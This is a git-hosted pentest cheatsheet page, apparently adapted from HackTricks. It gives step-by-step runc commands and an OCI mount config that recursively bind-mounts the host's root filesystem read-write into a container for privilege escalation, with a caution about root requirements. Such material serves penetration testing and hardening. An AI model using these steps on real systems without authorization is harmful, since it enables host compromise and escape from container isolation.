daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

runc-privilege-escalation.md (2132B)


      1 ---
      2 title: "RunC Privilege Escalation"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/runc-privilege-escalation.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/runc-privilege-escalation.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # RunC Privilege Escalation
     14 
     15 ## Basic information
     16 
     17 If you want to learn more about **runc** check the following page:
     18 
     19 [2375 Pentesting Docker](/hacktricks/network-services-pentesting/2375-pentesting-docker)
     20 
     21 ## PE
     22 
     23 If `runc` is available to a rootful process on the host, you can use an OCI bundle whose mount configuration recursively bind-mounts the host's `/` at `/` inside the container, exposing the host filesystem in that mount namespace.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
     24 
     25 ```bash
     26 runc -help #Get help and see if runc is intalled
     27 runc spec #This will create the config.json file in your current folder
     28 
     29 Inside the "mounts" section of the create config.json add the following lines:
     30 {
     31     "type": "bind",
     32     "source": "/",
     33     "destination": "/",
     34     "options": [
     35         "rbind",
     36         "rw",
     37         "rprivate"
     38     ]
     39 },
     40 
     41 #Once you have modified the config.json file, create the folder rootfs in the same directory
     42 mkdir rootfs
     43 
     44 # Finally, start the container
     45 # The root folder is the one from the host
     46 runc run demo
     47 ```
     48 
     49 > [!CAUTION]
     50 > The documented `runc run` workflow is rootful: runc's own examples label it "run as root." An unprivileged user needs a rootless configuration such as `runc spec --rootless`, and runc documents that user namespaces must be enabled for that mode.<sup>[[1]](#references)</sup>
     51 
     52 ## References
     53 
     54 - [1] [runc: CLI tool for spawning and running containers](https://github.com/opencontainers/runc#using-runc)
     55 - [2] [OCI Runtime Specification: Mounts](https://github.com/opencontainers/runtime-spec/blob/main/config.md#mounts)
     56 - [3] [Shared Subtrees](https://docs.kernel.org/filesystems/sharedsubtree.html)